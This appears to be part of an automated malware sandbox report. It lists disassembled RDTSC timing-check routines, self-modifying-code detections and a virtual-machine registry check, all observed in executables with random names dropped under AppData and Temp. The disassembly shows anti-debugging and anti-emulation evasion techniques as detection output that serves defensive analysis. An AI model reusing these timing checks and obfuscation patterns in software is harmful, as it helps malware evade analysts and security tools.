Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F00922 second address: 4F009DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC30Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c mov ecx, ebx 0x0000000e pushfd 0x0000000f jmp 00007F5828CEC319h 0x00000014 sub si, 7D86h 0x00000019 jmp 00007F5828CEC311h 0x0000001e popfd 0x0000001f popad 0x00000020 test esi, esi 0x00000022 jmp 00007F5828CEC30Eh 0x00000027 je 00007F589AD01D1Ah 0x0000002d pushad 0x0000002e mov dx, ax 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F5828CEC318h 0x00000038 add esi, 2BDAB288h 0x0000003e jmp 00007F5828CEC30Bh 0x00000043 popfd 0x00000044 mov esi, 7CDD6AFFh 0x00000049 popad 0x0000004a popad 0x0000004b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 jmp 00007F5828CEC317h 0x0000005a mov ah, 54h 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F009DB second address: 4F00A01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5828704A6Ah 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F00A01 second address: 4F00A07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F00B38 second address: 4F00B49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, cx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c movsx ebx, cx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F00B49 second address: 4F00B53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 mov di, ax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F00B53 second address: 4F00B96 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5828704A74h 0x00000008 sbb cx, AF08h 0x0000000d jmp 00007F5828704A6Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F5828704A75h 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F00BCD second address: 4F00C33 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F5828CEC30Ah 0x0000000c jmp 00007F5828CEC315h 0x00000011 popfd 0x00000012 popad 0x00000013 pop esi 0x00000014 pushad 0x00000015 mov si, 79B3h 0x00000019 call 00007F5828CEC318h 0x0000001e mov ah, 05h 0x00000020 pop edi 0x00000021 popad 0x00000022 pop ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F5828CEC319h 0x0000002a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F00C33 second address: 4F00C59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esp, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5828704A6Dh 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F00C59 second address: 4F00C5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F00C5F second address: 4F00C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F10D9B second address: 4F10DB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F10A01 second address: 4F10A05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F10A05 second address: 4F10A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F10A0B second address: 4F10A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F10A11 second address: 4F10A15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F10A15 second address: 4F10A19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F10A19 second address: 4F10A6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F5828CEC30Dh 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 push edi 0x00000012 pushfd 0x00000013 jmp 00007F5828CEC316h 0x00000018 jmp 00007F5828CEC315h 0x0000001d popfd 0x0000001e pop esi 0x0000001f popad 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F5828CEC30Ah 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F9072C second address: 4F90744 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A74h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F90744 second address: 4F90774 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F5828CEC30Ch 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F5828CEC310h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F90774 second address: 4F90778 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F90778 second address: 4F9077E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F9077E second address: 4F9078D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A6Bh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F9078D second address: 4F90791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F90791 second address: 4F907C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F5828704A6Dh 0x00000012 add ecx, 20C99846h 0x00000018 jmp 00007F5828704A71h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F907C4 second address: 4F907C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F8091B second address: 4F80930 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A71h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F80775 second address: 4F80785 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828CEC30Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F80785 second address: 4F80794 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F80794 second address: 4F80798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F80798 second address: 4F807AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F807AB second address: 4F807F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828CEC30Fh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F5828CEC315h 0x00000011 mov ebp, esp 0x00000013 jmp 00007F5828CEC30Eh 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F5828CEC30Ah 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F807F5 second address: 4F807FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F200D2 second address: 4F200D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F200D8 second address: 4F200DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F200DC second address: 4F2011E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a call 00007F5828CEC314h 0x0000000f pushad 0x00000010 popad 0x00000011 pop esi 0x00000012 mov dx, 2854h 0x00000016 popad 0x00000017 mov dword ptr [esp], ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5828CEC315h 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F2011E second address: 4F20133 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A71h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F80B74 second address: 4F80B7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F80B7A second address: 4F80B7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F80B7E second address: 4F80B82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F80B82 second address: 4F80BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F5828704A76h 0x00000010 or eax, 78FB7C08h 0x00000016 jmp 00007F5828704A6Bh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F5828704A76h 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F80BCD second address: 4F80C0B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5828CEC312h 0x00000008 xor cx, 7198h 0x0000000d jmp 00007F5828CEC30Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5828CEC310h 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F80C0B second address: 4F80C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 4F80CE1 second address: 4F80CEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC30Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: EDF434 second address: EDF438 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: EDF438 second address: EDF43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1063639 second address: 106363F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 106363F second address: 1063649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1063D5F second address: 1063D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1063EDE second address: 1063F1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F5828CEC313h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F5828CEC32Dh 0x00000011 jmp 00007F5828CEC30Dh 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F5828CEC30Eh 0x0000001d rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 10658C1 second address: 106594E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov edx, dword ptr [ebp+122D2C6Bh] 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D180Ah], ecx 0x00000016 push 1CF5C958h 0x0000001b push edi 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f jmp 00007F5828704A6Ah 0x00000024 popad 0x00000025 pop edi 0x00000026 xor dword ptr [esp], 1CF5C9D8h 0x0000002d xor edi, dword ptr [ebp+122D2C93h] 0x00000033 push 00000003h 0x00000035 pushad 0x00000036 mov ebx, dword ptr [ebp+122D2A7Fh] 0x0000003c mov edi, dword ptr [ebp+122D2BEBh] 0x00000042 popad 0x00000043 push 00000000h 0x00000045 mov edi, dword ptr [ebp+122D2BBBh] 0x0000004b mov edi, dword ptr [ebp+122D2BEBh] 0x00000051 push 00000003h 0x00000053 push 00000000h 0x00000055 push eax 0x00000056 call 00007F5828704A68h 0x0000005b pop eax 0x0000005c mov dword ptr [esp+04h], eax 0x00000060 add dword ptr [esp+04h], 00000018h 0x00000068 inc eax 0x00000069 push eax 0x0000006a ret 0x0000006b pop eax 0x0000006c ret 0x0000006d mov edx, dword ptr [ebp+122D1BD9h] 0x00000073 call 00007F5828704A69h 0x00000078 push eax 0x00000079 push edx 0x0000007a push ecx 0x0000007b pushad 0x0000007c popad 0x0000007d pop ecx 0x0000007e rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 106594E second address: 1065962 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 js 00007F5828CEC306h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1065962 second address: 1065966 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1065AC9 second address: 1065B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jg 00007F5828CEC306h 0x0000000e popad 0x0000000f popad 0x00000010 xor dword ptr [esp], 599FCCE4h 0x00000017 jmp 00007F5828CEC30Ah 0x0000001c push 00000003h 0x0000001e mov edx, dword ptr [ebp+122D2C23h] 0x00000024 sub edi, 305AD351h 0x0000002a push 00000000h 0x0000002c add dword ptr [ebp+122D1D3Dh], edx 0x00000032 push 00000003h 0x00000034 push 00000000h 0x00000036 push eax 0x00000037 call 00007F5828CEC308h 0x0000003c pop eax 0x0000003d mov dword ptr [esp+04h], eax 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc eax 0x0000004a push eax 0x0000004b ret 0x0000004c pop eax 0x0000004d ret 0x0000004e mov dx, cx 0x00000051 sub esi, 1320830Ch 0x00000057 push ACA5E9A0h 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1065B3B second address: 1065B52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A73h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1065B52 second address: 1065BA5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC30Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 135A1660h 0x00000010 mov cx, si 0x00000013 lea ebx, dword ptr [ebp+1245A78Fh] 0x00000019 je 00007F5828CEC30Ch 0x0000001f sbb ecx, 2208CF27h 0x00000025 xchg eax, ebx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 jc 00007F5828CEC306h 0x0000002f jmp 00007F5828CEC319h 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1065BA5 second address: 1065BC0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 ja 00007F5828704A66h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007F5828704A6Ch 0x00000015 jnp 00007F5828704A66h 0x0000001b rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1065C63 second address: 1065D1C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5828CEC308h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f xor cx, 1527h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 mov dword ptr [ebp+122D2877h], eax 0x0000001d pop ecx 0x0000001e push 9E482409h 0x00000023 pushad 0x00000024 jmp 00007F5828CEC313h 0x00000029 pushad 0x0000002a jmp 00007F5828CEC310h 0x0000002f push ecx 0x00000030 pop ecx 0x00000031 popad 0x00000032 popad 0x00000033 add dword ptr [esp], 61B7DC77h 0x0000003a jp 00007F5828CEC307h 0x00000040 stc 0x00000041 push 00000003h 0x00000043 push 00000000h 0x00000045 sub dword ptr [ebp+122D288Bh], esi 0x0000004b push 00000003h 0x0000004d push 00000000h 0x0000004f push edi 0x00000050 call 00007F5828CEC308h 0x00000055 pop edi 0x00000056 mov dword ptr [esp+04h], edi 0x0000005a add dword ptr [esp+04h], 00000014h 0x00000062 inc edi 0x00000063 push edi 0x00000064 ret 0x00000065 pop edi 0x00000066 ret 0x00000067 call 00007F5828CEC317h 0x0000006c sub dword ptr [ebp+122D1BD9h], esi 0x00000072 pop ecx 0x00000073 jmp 00007F5828CEC30Bh 0x00000078 call 00007F5828CEC309h 0x0000007d pushad 0x0000007e push eax 0x0000007f push edx 0x00000080 push ecx 0x00000081 pop ecx 0x00000082 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1065DE9 second address: 1065DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 10783A6 second address: 10783AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 10783AA second address: 10783C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1052C6D second address: 1052C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F5828CEC314h 0x0000000a pop esi 0x0000000b push eax 0x0000000c je 00007F5828CEC308h 0x00000012 push eax 0x00000013 pop eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 108474E second address: 1084752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1084752 second address: 1084770 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5828CEC319h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1084770 second address: 1084785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F5828704A68h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1084785 second address: 1084791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007F5828CEC306h 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1084791 second address: 1084795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1084795 second address: 10847A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jne 00007F5828CEC306h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 10847A7 second address: 10847AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 1084EA7 second address: 1084EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe RDTSC instruction interceptor: First address: 108501E second address: 1085073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F5828704A74h 0x0000000a pushad 0x0000000b jmp 00007F5828704A6Ah 0x00000010 jmp 00007F5828704A72h 0x00000015 jmp 00007F5828704A79h 0x0000001a popad 0x0000001b popad 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Special instruction interceptor: First address: 7BEAFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Special instruction interceptor: First address: 984C06 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Special instruction interceptor: First address: 9E4D47 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: B8EAFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: D54C06 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Special instruction interceptor: First address: 1116B2D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: DB4D47 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Special instruction interceptor: First address: 906B2D instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
